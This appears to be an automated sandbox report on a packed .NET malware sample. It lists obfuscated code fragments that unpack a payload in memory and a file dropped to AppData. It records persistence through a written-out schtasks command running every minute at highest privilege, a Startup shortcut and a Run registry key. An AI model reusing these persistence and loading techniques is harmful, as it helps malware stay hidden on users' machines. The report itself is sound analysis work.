Source: C:\Windows\System32\OpenWith.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: directmanipulation.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\0720XW	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: 0720XW.lnk.0.dr

LNK file: ..\..\..\..\..\0720XW

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Or3dzp4vB1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Or3dzp4vB1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{fKaGa2Ywr5w3PQGiDmBI7REAS2.OfmMe96PKz6fBbr5ERVLa0ECNU,fKaGa2Ywr5w3PQGiDmBI7REAS2.Qd9IkzXLcYSpeUDcLiJ0k6jSSB,fKaGa2Ywr5w3PQGiDmBI7REAS2.gCWEUye2elEc21qKVKv6jS5nVe,fKaGa2Ywr5w3PQGiDmBI7REAS2._756niOLr7HAcJ3K5pTXXhRxOqW,v1WK3HQ1SJk.r7uo75hMYra()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{U7UF6FVShoQaqZCocZieCFKMOI[2],v1WK3HQ1SJk.yK06dlAZ5bW(Convert.FromBase64String(U7UF6FVShoQaqZCocZieCFKMOI[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { U7UF6FVShoQaqZCocZieCFKMOI[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{fKaGa2Ywr5w3PQGiDmBI7REAS2.OfmMe96PKz6fBbr5ERVLa0ECNU,fKaGa2Ywr5w3PQGiDmBI7REAS2.Qd9IkzXLcYSpeUDcLiJ0k6jSSB,fKaGa2Ywr5w3PQGiDmBI7REAS2.gCWEUye2elEc21qKVKv6jS5nVe,fKaGa2Ywr5w3PQGiDmBI7REAS2._756niOLr7HAcJ3K5pTXXhRxOqW,v1WK3HQ1SJk.r7uo75hMYra()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{U7UF6FVShoQaqZCocZieCFKMOI[2],v1WK3HQ1SJk.yK06dlAZ5bW(Convert.FromBase64String(U7UF6FVShoQaqZCocZieCFKMOI[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { U7UF6FVShoQaqZCocZieCFKMOI[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: qWy2E8XSCtTc1JKzdFAQi6Nl7V System.AppDomain.Load(byte[])
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: Oy8bNhw1cIkEGBeYrosDf1RWwU System.AppDomain.Load(byte[])
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: Oy8bNhw1cIkEGBeYrosDf1RWwU
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: qWy2E8XSCtTc1JKzdFAQi6Nl7V System.AppDomain.Load(byte[])
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: Oy8bNhw1cIkEGBeYrosDf1RWwU System.AppDomain.Load(byte[])
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs	.Net Code: Oy8bNhw1cIkEGBeYrosDf1RWwU

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAACB8D2A5 pushad ; iretd	2_2_00007FFAACB8D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAACCA0942 push E95AABD0h; ret	2_2_00007FFAACCA09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAACD72316 push 8B485F95h; iretd	2_2_00007FFAACD7231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFAACBCD2A5 pushad ; iretd	11_2_00007FFAACBCD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFAACDB2316 push 8B485F91h; iretd	11_2_00007FFAACDB231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFAACB8D2A5 pushad ; iretd	15_2_00007FFAACB8D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFAACD72316 push 8B485F95h; iretd	15_2_00007FFAACD7231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAACB8D2A5 pushad ; iretd	17_2_00007FFAACB8D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAACD72316 push 8B485F95h; iretd	17_2_00007FFAACD7231B

Source: Or3dzp4vB1.exe, XKCxMrKYDPJ.cs	High entropy of concatenated method names: '_4Wq7wUQrvV4', 'TM7eQerxMxo', '_1X26WUw8S0i', 'GEG8iUfaIYEAmNmcUZ5mi', 'AAoBITHtn57KIPVUxyoYS', 'fI4K21gzErYdhSpsSnPHe', 'VpBs7zSudJO6TvgyN6bHK', 'fY6SKyua5jJFnRecDAS7U', 'XhtoqOaFZKVZdXGd2ZMwn', 'MfplRFiWoOVKnpyJLzTv4'
Source: Or3dzp4vB1.exe, aMBq7AoUdbi.cs	High entropy of concatenated method names: 'YjnS6rgTn5x', 'tXs77Ner9js', 'afRdwGzyVtG', 'Uz6F61eWSVB', 'xaoaudGCeemLeY5INfFjHRcyeoA3N2rFlwWgNqSfkBBEjBIgv5bUXQonUEouU26kcS9xl6lYBqmfUe', 'hMf7Uh1WpmIzgRRR6AtkFuYUuMKLqLXmLge9nZNyCksbm98oH9ISMj1CKMFzgGbQbioYRrvTy5oiJO', 'Jy53AGECYypLOGJv4jX6LOLs49Kgn7nwGpF2Hr8QI1iuLFl8g6jFTOHalqjmcInXsB80W4uugiMOZw', '_6fODW7JyfZDcfXDQa5BMZscIkmm3yyxxWGj71CpLW2lAXmVcnh9gQwq0Ghhhne9OE8DFGyxZ3sLQh1', 'vqpy57XNyMUFktz2MCm1sN8VQSc09ehxBs9PjDj2KQFfZubbQyjSX1aOctj5nHjKAgKkdkEKO660j8', 'Nx8FtENUC0LP2Su2r4RgaAyyy1Ri25T9kXJOtHRfJVN6oeUyxP2k1BTGsLZWVtMswHLsQuEYKYysmj'
Source: Or3dzp4vB1.exe, 7JiCBK2jKP4.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'xmZjWrOtWOK', 'kGNUZ8BBRvLJxTgP39vKiskhNilLWlzFFV4cDaOVlMdzEjLSj1xRtPFQoXsp3UjU1GSW5DafaBf6mruLXWitJs2NqcaFC', 'PyRIWUeldzjtRMcB7Iundx5NRU84BxtpoWgOIbCcPiZqcY4rMKOXfb3jA7Oo3gy4yMlJ5yY7lWhIl3aRHSYedrLYUAKiC', 'S66p4NaO1QiZREbhbnfsfwsKXhVNoqEzwyP5kdZsqzKMoIRSBTf0dQd1WulIm4WVQPc28JjIJ0VDne', 'W62WXt6V3pXbZ3SXuvZbDmpNSjj6t9qUMKPpJSwJpodYrhi048NObyjA4zRrsCqUt7wof6GkVrPg9M'
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs	High entropy of concatenated method names: 'jVmkKMdstbzzSNoABl88HocT0p', 'qWy2E8XSCtTc1JKzdFAQi6Nl7V', 'u5YAXQo9PWkuFnzINaPfvD0aOu', 'MKqGNgN5zCpQvxCK8Et9gDk0jk', 'ihGf0hY79InhFh2aZYe5mgEgKl', 'DMusHCDdVmslT8N7yMm2gh6NQa', 'Q9MaVd5JdBQ3g1VLeR2Df2M0bc', 'DsOdJwb5RCMHFeGR6tQigW9B22', 'epN8Kkwbqy86fRKkDW7HhuLJXU', 'aMcwASUT5JHnrsz1gpYdM4FAFB'
Source: Or3dzp4vB1.exe, DjfjT5OwA7O.cs	High entropy of concatenated method names: 'rtkvH2LWxcF', 'GGZXgumyHH1', 'wtr4eJLwvNOcYeDOrUvzWjEm8ZNDoDUtfbwhy0XoYkboZzNc5PHopos74lEmNrc7QTdKuE1UAbVjp9', 'ZUILCFq1x0ixLMS0fNXQezD6EWJpT1W4T0LekNvRCbxINjreWnyBE0wefIlyNWGVGLjgyijq6tTaYP', 'uqWNCQ5vYZkoUA39WX5FyIKBCCdKdfEbc1nRtIhfcwOo8ofLU17IAa5uoBDjPcc9UTaGKj2RC5VFtt', 'lJ3sVZrjNS2CrE5FP4Iq2dgzeQNZaPpifwryCO5gEoV6ysU8YptPaR5CRoXFf30KzU2W6jsYIo8zlg'
Source: Or3dzp4vB1.exe, UVh6gYqDsRseIc6LISxgabwfDL.cs	High entropy of concatenated method names: 'DSCAbwMnxRr7s0CyzNRcAC7vVx', 'rHTu5xsEbhlnGxYGRDSEneJExz', 'jMlIBniz0G0KBYkxzwjDyjCp4a', 'iAV2B28o53XoR0fcSOnb6zZSvJ', 'oT9BRwtAwJ3PXU0msFPNwe5Sxl', 'kKtvD7IccIJRnBTz5bW8k1TZMI', 'tm0PFEVMWu8s50OXfwIOkl9DR3', 'xe2Bvj4V4xB', 'OxNJzl1jVor', 'wNuTMZjjDyX'
Source: Or3dzp4vB1.exe, v1WK3HQ1SJk.cs	High entropy of concatenated method names: 'YlmC3pb68NB', 'buL8kR0oIiB', 'x1xfZCV3rwQ', 'whb3Qh9SjIG', 'SAZnAqHpmwQ', 'ekkMuNK2jcz', 'ZSNDpc7VeAu', 'DmXrmqJaYdc', 'qkGejArAPUg', 'dk1qwuWDkc0'
Source: Or3dzp4vB1.exe, 2PiJ0XhLI0Qp8KhHBi10nRhXgt.cs	High entropy of concatenated method names: '_1IbDOXDulvGK89BzdxkPXa2b0Z', 'VyUpp9scFeA', 'kHkif2Mmrxy', 'DcdysQvsw9u', 'RgVqbUuRszX', 'r5XztVKM2ed', 'tEfshgdcdk3', 'hBxFFg2eETE', 'iVUy0gaRpYh', 'ATwj6CdWP5c'
Source: Or3dzp4vB1.exe, jGEa6BYs0PLz0bPSuuML3cXJ6C.cs	High entropy of concatenated method names: 'MSA8IbsX3mwvSFphnHRsQVgEgY', 'CpUujZSdP2JvfAZKAufC2Zqcp1zi7hYKChPMyLHwk8YReX87YEmkcRiohgABDDoiNKE1m5bpKVSY', 'mqDkrHTPT1hbkm7Z8dcRpqDFC8BYP87YyvRWjl2LlnzpoFr32TTxyveUtk1MzL2SFmLJbl2zEdBe', 'H841selCro0xvgoYufMdmXBw5RvzW3PzCLK8hEPMEAA3MJFZ8fNQmCy7dr0MVOJ6a8ID4j9hd31H', 'FXvaLdv3oSxguFTmFIZ4NghnwsST1w92btk6L4hrR5BtpkDyyG0Od5rERwFbI5nVz2x7O21AMrKe'
Source: Or3dzp4vB1.exe, 6tNVwwp2mfC.cs	High entropy of concatenated method names: 'vM6XSdz8mMu', 'mttYXo6jbFUJPCV3yvi5TS8tXWag4jzmkSn5tfvGEUjLj2KEfw6KZlGuTNAnb51sJADcbAW6FgTBmW', 'WoQQkJeVqYg5HVtavuA7NHaxDsykT9EbRBwSxHscKc58JFXEkEonZtPS1m3Nq7tirj4wYloRY505bw', 'i4ER7tGwmD7eFKamNt9schZEf2fOLJQFxIliGZoMBl0hafrHJrm7KpNZNLzFZT4CpjDaH90rdCylVX', '_8RvOPLbVCCBRGuLKoi2rHzJ5mYLtZB3P2ahq7moSlbLGDDPF2aaIrWoO6wsWAkdHvooNwc1NBEniNi'
Source: Or3dzp4vB1.exe, G4bL9AcMy6N.cs	High entropy of concatenated method names: 'RegexResult', 'WndProc', 'WSNdFLy8Hc7sJaqGIGfzBTJDBppT9CvgmiSEssA8y3BGqHQWhfK7GPzenh0CBXcGgmTqbNblwB3djL', 'X5oed2KF6qlXYfbjpF1JL7cVTqU0XRnHkcXXd0cKGXJUdHkGLZGbaek7GXJMfOvCBLp2wGrs2ICbK3'
Source: Or3dzp4vB1.exe, T8OeMrVcLjImLRIolSzxRmx4be.cs	High entropy of concatenated method names: 'ykZWS7LvuIYNONbiVEsNDfx2ry', 'bfmqyChL0E0rDbp7Z846RlVLrR', '_8YERJqyml6SCjt9B4dJ77CwH7S', 'R3V6Omm38oSRQxtqYOy5LDxrc7ZhAQ7hToOUW7zZpWRwdZUaAbGLSK9kumDjNggYsa0UyFIlTz9U', 'UkelaLSCF7wYsHif0kvqIBlCUOIA9npm8B0QpgEG0YIRLGNCDj5ZO8eLmtgxi12kFEMDTKuaLpPu', 'gfUdpKZ4gHwp2qWCcsJNYfvTo0f9stxLDFdxOeHW4v16biAiWSNcm1xgMzjspYEObdluPrgA6DYX', '_4KOrpYbZEFqVSRQKxTQCZ3CdTbiwkNBCp9QP1XNaWKFCHf6MGiWlxEHPhfpaPYTYYF0exx92F2sv', '_4ByAM2p7sPUvpjYXfPaY5CofhI3rwS4CtkkcFNe4dfXHUkqQHSjGoAF6rWf0gnKvddnVJDlkKOm6', 'kkSh58Hm9xu0g8COzdRu2tCxy2AUbV2gUVnYtaVozJsddia8UxVDN07zVlDWLOSQlvl1gv16oBuZ', 'OtxiTMEdP1SYC6JFCaeeqzC1iYgsbfPyZynuPKU7CUTpZPpZ0Cnlh9VFGcYnzM4M5Lx15NOq9GDv'
Source: Or3dzp4vB1.exe, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs	High entropy of concatenated method names: 'ARkgBXY9ORlKdTk02oic2KgdMk', 'tX5I6jT8h10j6FFzvkftOPr19n', '_9IWk8c9fZhgNE9q0Woxy6X9sBg', 'p5xH6MPPF4hq0UOJEUqAvzYCQg', 'ApYEo4fhfDDUuVOjd9oHh6jZDC', 'goiwqAYPCYXpDFRMlFZ1Fclz5l', 'WC4U2Cksw1oVKmKi1rMclSIqwl', '_0zoED2yorcNCSudJsBNlhRZnqE', 'qbtyA2P8qVYRLXvQEnj5iklScE', 'tSG1XKKmKmTwyZGUHXFddUEETA'
Source: 0720XW.0.dr, XKCxMrKYDPJ.cs	High entropy of concatenated method names: '_4Wq7wUQrvV4', 'TM7eQerxMxo', '_1X26WUw8S0i', 'GEG8iUfaIYEAmNmcUZ5mi', 'AAoBITHtn57KIPVUxyoYS', 'fI4K21gzErYdhSpsSnPHe', 'VpBs7zSudJO6TvgyN6bHK', 'fY6SKyua5jJFnRecDAS7U', 'XhtoqOaFZKVZdXGd2ZMwn', 'MfplRFiWoOVKnpyJLzTv4'
Source: 0720XW.0.dr, aMBq7AoUdbi.cs	High entropy of concatenated method names: 'YjnS6rgTn5x', 'tXs77Ner9js', 'afRdwGzyVtG', 'Uz6F61eWSVB', 'xaoaudGCeemLeY5INfFjHRcyeoA3N2rFlwWgNqSfkBBEjBIgv5bUXQonUEouU26kcS9xl6lYBqmfUe', 'hMf7Uh1WpmIzgRRR6AtkFuYUuMKLqLXmLge9nZNyCksbm98oH9ISMj1CKMFzgGbQbioYRrvTy5oiJO', 'Jy53AGECYypLOGJv4jX6LOLs49Kgn7nwGpF2Hr8QI1iuLFl8g6jFTOHalqjmcInXsB80W4uugiMOZw', '_6fODW7JyfZDcfXDQa5BMZscIkmm3yyxxWGj71CpLW2lAXmVcnh9gQwq0Ghhhne9OE8DFGyxZ3sLQh1', 'vqpy57XNyMUFktz2MCm1sN8VQSc09ehxBs9PjDj2KQFfZubbQyjSX1aOctj5nHjKAgKkdkEKO660j8', 'Nx8FtENUC0LP2Su2r4RgaAyyy1Ri25T9kXJOtHRfJVN6oeUyxP2k1BTGsLZWVtMswHLsQuEYKYysmj'
Source: 0720XW.0.dr, 7JiCBK2jKP4.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'xmZjWrOtWOK', 'kGNUZ8BBRvLJxTgP39vKiskhNilLWlzFFV4cDaOVlMdzEjLSj1xRtPFQoXsp3UjU1GSW5DafaBf6mruLXWitJs2NqcaFC', 'PyRIWUeldzjtRMcB7Iundx5NRU84BxtpoWgOIbCcPiZqcY4rMKOXfb3jA7Oo3gy4yMlJ5yY7lWhIl3aRHSYedrLYUAKiC', 'S66p4NaO1QiZREbhbnfsfwsKXhVNoqEzwyP5kdZsqzKMoIRSBTf0dQd1WulIm4WVQPc28JjIJ0VDne', 'W62WXt6V3pXbZ3SXuvZbDmpNSjj6t9qUMKPpJSwJpodYrhi048NObyjA4zRrsCqUt7wof6GkVrPg9M'
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs	High entropy of concatenated method names: 'jVmkKMdstbzzSNoABl88HocT0p', 'qWy2E8XSCtTc1JKzdFAQi6Nl7V', 'u5YAXQo9PWkuFnzINaPfvD0aOu', 'MKqGNgN5zCpQvxCK8Et9gDk0jk', 'ihGf0hY79InhFh2aZYe5mgEgKl', 'DMusHCDdVmslT8N7yMm2gh6NQa', 'Q9MaVd5JdBQ3g1VLeR2Df2M0bc', 'DsOdJwb5RCMHFeGR6tQigW9B22', 'epN8Kkwbqy86fRKkDW7HhuLJXU', 'aMcwASUT5JHnrsz1gpYdM4FAFB'
Source: 0720XW.0.dr, DjfjT5OwA7O.cs	High entropy of concatenated method names: 'rtkvH2LWxcF', 'GGZXgumyHH1', 'wtr4eJLwvNOcYeDOrUvzWjEm8ZNDoDUtfbwhy0XoYkboZzNc5PHopos74lEmNrc7QTdKuE1UAbVjp9', 'ZUILCFq1x0ixLMS0fNXQezD6EWJpT1W4T0LekNvRCbxINjreWnyBE0wefIlyNWGVGLjgyijq6tTaYP', 'uqWNCQ5vYZkoUA39WX5FyIKBCCdKdfEbc1nRtIhfcwOo8ofLU17IAa5uoBDjPcc9UTaGKj2RC5VFtt', 'lJ3sVZrjNS2CrE5FP4Iq2dgzeQNZaPpifwryCO5gEoV6ysU8YptPaR5CRoXFf30KzU2W6jsYIo8zlg'
Source: 0720XW.0.dr, UVh6gYqDsRseIc6LISxgabwfDL.cs	High entropy of concatenated method names: 'DSCAbwMnxRr7s0CyzNRcAC7vVx', 'rHTu5xsEbhlnGxYGRDSEneJExz', 'jMlIBniz0G0KBYkxzwjDyjCp4a', 'iAV2B28o53XoR0fcSOnb6zZSvJ', 'oT9BRwtAwJ3PXU0msFPNwe5Sxl', 'kKtvD7IccIJRnBTz5bW8k1TZMI', 'tm0PFEVMWu8s50OXfwIOkl9DR3', 'xe2Bvj4V4xB', 'OxNJzl1jVor', 'wNuTMZjjDyX'
Source: 0720XW.0.dr, v1WK3HQ1SJk.cs	High entropy of concatenated method names: 'YlmC3pb68NB', 'buL8kR0oIiB', 'x1xfZCV3rwQ', 'whb3Qh9SjIG', 'SAZnAqHpmwQ', 'ekkMuNK2jcz', 'ZSNDpc7VeAu', 'DmXrmqJaYdc', 'qkGejArAPUg', 'dk1qwuWDkc0'
Source: 0720XW.0.dr, 2PiJ0XhLI0Qp8KhHBi10nRhXgt.cs	High entropy of concatenated method names: '_1IbDOXDulvGK89BzdxkPXa2b0Z', 'VyUpp9scFeA', 'kHkif2Mmrxy', 'DcdysQvsw9u', 'RgVqbUuRszX', 'r5XztVKM2ed', 'tEfshgdcdk3', 'hBxFFg2eETE', 'iVUy0gaRpYh', 'ATwj6CdWP5c'
Source: 0720XW.0.dr, jGEa6BYs0PLz0bPSuuML3cXJ6C.cs	High entropy of concatenated method names: 'MSA8IbsX3mwvSFphnHRsQVgEgY', 'CpUujZSdP2JvfAZKAufC2Zqcp1zi7hYKChPMyLHwk8YReX87YEmkcRiohgABDDoiNKE1m5bpKVSY', 'mqDkrHTPT1hbkm7Z8dcRpqDFC8BYP87YyvRWjl2LlnzpoFr32TTxyveUtk1MzL2SFmLJbl2zEdBe', 'H841selCro0xvgoYufMdmXBw5RvzW3PzCLK8hEPMEAA3MJFZ8fNQmCy7dr0MVOJ6a8ID4j9hd31H', 'FXvaLdv3oSxguFTmFIZ4NghnwsST1w92btk6L4hrR5BtpkDyyG0Od5rERwFbI5nVz2x7O21AMrKe'
Source: 0720XW.0.dr, 6tNVwwp2mfC.cs	High entropy of concatenated method names: 'vM6XSdz8mMu', 'mttYXo6jbFUJPCV3yvi5TS8tXWag4jzmkSn5tfvGEUjLj2KEfw6KZlGuTNAnb51sJADcbAW6FgTBmW', 'WoQQkJeVqYg5HVtavuA7NHaxDsykT9EbRBwSxHscKc58JFXEkEonZtPS1m3Nq7tirj4wYloRY505bw', 'i4ER7tGwmD7eFKamNt9schZEf2fOLJQFxIliGZoMBl0hafrHJrm7KpNZNLzFZT4CpjDaH90rdCylVX', '_8RvOPLbVCCBRGuLKoi2rHzJ5mYLtZB3P2ahq7moSlbLGDDPF2aaIrWoO6wsWAkdHvooNwc1NBEniNi'
Source: 0720XW.0.dr, G4bL9AcMy6N.cs	High entropy of concatenated method names: 'RegexResult', 'WndProc', 'WSNdFLy8Hc7sJaqGIGfzBTJDBppT9CvgmiSEssA8y3BGqHQWhfK7GPzenh0CBXcGgmTqbNblwB3djL', 'X5oed2KF6qlXYfbjpF1JL7cVTqU0XRnHkcXXd0cKGXJUdHkGLZGbaek7GXJMfOvCBLp2wGrs2ICbK3'
Source: 0720XW.0.dr, T8OeMrVcLjImLRIolSzxRmx4be.cs	High entropy of concatenated method names: 'ykZWS7LvuIYNONbiVEsNDfx2ry', 'bfmqyChL0E0rDbp7Z846RlVLrR', '_8YERJqyml6SCjt9B4dJ77CwH7S', 'R3V6Omm38oSRQxtqYOy5LDxrc7ZhAQ7hToOUW7zZpWRwdZUaAbGLSK9kumDjNggYsa0UyFIlTz9U', 'UkelaLSCF7wYsHif0kvqIBlCUOIA9npm8B0QpgEG0YIRLGNCDj5ZO8eLmtgxi12kFEMDTKuaLpPu', 'gfUdpKZ4gHwp2qWCcsJNYfvTo0f9stxLDFdxOeHW4v16biAiWSNcm1xgMzjspYEObdluPrgA6DYX', '_4KOrpYbZEFqVSRQKxTQCZ3CdTbiwkNBCp9QP1XNaWKFCHf6MGiWlxEHPhfpaPYTYYF0exx92F2sv', '_4ByAM2p7sPUvpjYXfPaY5CofhI3rwS4CtkkcFNe4dfXHUkqQHSjGoAF6rWf0gnKvddnVJDlkKOm6', 'kkSh58Hm9xu0g8COzdRu2tCxy2AUbV2gUVnYtaVozJsddia8UxVDN07zVlDWLOSQlvl1gv16oBuZ', 'OtxiTMEdP1SYC6JFCaeeqzC1iYgsbfPyZynuPKU7CUTpZPpZ0Cnlh9VFGcYnzM4M5Lx15NOq9GDv'
Source: 0720XW.0.dr, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs	High entropy of concatenated method names: 'ARkgBXY9ORlKdTk02oic2KgdMk', 'tX5I6jT8h10j6FFzvkftOPr19n', '_9IWk8c9fZhgNE9q0Woxy6X9sBg', 'p5xH6MPPF4hq0UOJEUqAvzYCQg', 'ApYEo4fhfDDUuVOjd9oHh6jZDC', 'goiwqAYPCYXpDFRMlFZ1Fclz5l', 'WC4U2Cksw1oVKmKi1rMclSIqwl', '_0zoED2yorcNCSudJsBNlhRZnqE', 'qbtyA2P8qVYRLXvQEnj5iklScE', 'tSG1XKKmKmTwyZGUHXFddUEETA'

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

File created: C:\Users\user\AppData\Roaming\0720XW

Jump to dropped file

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

File created: C:\Users\user\AppData\Roaming\0720XW

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW"

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0720XW.lnk

Jump to behavior

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0720XW.lnk

Jump to behavior

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0720XW			Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0720XW			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
